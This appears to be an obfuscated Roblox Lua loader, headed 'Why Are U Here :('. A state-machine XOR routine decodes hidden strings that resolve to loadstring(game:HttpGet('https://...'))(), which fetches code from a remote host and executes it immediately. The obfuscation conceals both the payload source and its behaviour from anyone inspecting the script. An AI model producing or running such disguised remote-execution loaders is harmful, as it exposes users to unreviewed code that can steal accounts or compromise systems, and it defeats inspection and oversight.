-- [ Why Are U Here :( ]

local j=bit32.bxor
local c,h,d_,m,a_,s_,i_,v,b_,e_;
d_=(getfenv());
s_,e_,b_=(string.char),(string.byte),(bit32 .bxor);
a_=function(w_,l_)
    local o_,p,f_,k,n_,q,g,t_;
    p,g={},function(r_,x,u_)
        p[u_]=j(r_,25623)-j(x,48668)
        return p[u_]
    end;
    n_=p[12419]or g(90461,19784,12419)
    repeat
        if n_<44910 then
            if n_>=4598 then
                if n_>4598 then
                    t_,n_=t_..s_(b_(e_(w_,(k-80)+1),e_(l_,(k-80)%#l_+1))),p[-3479]or g(80302,10737,-3479)
                else
                    t_='';
                    q,n_,f_,o_=(#w_-1)+80,63549,1,80
                end
            else
                return t_
            end
        elseif n_<=50636 then
            if n_<=44910 then
                if(f_>=0 and o_>q)or((f_<0 or f_~=f_)and o_<q)then
                    n_=2680
                else
                    n_=20153
                end
            else
                o_=o_+f_;
                k=o_
                if o_~=o_ then
                    n_=2680
                else
                    n_=44910
                end
            end
        else
            k=o_
            if q~=q then
                n_=p[-16737]or g(37013,21526,-16737)
            else
                n_=p[12007]or g(37331,63562,12007)
            end
        end
    until n_==11567
end;
d_[a_('e\132\159I\230}\153\151C\242','\t\235\254-\149')](d_[a_('R]XY','5<')][a_('l\201\14T\250\31P','$\189z')](d_[a_('R]XY','5<')],a_('R\20l:\246\163\155\\\137\197a.\233\151\205T[\16he\198\218\251\49\188\243+\23\163\131\213\r',':\96\24J\133\153\180s\249\164\18Z\140\241\180z')))()
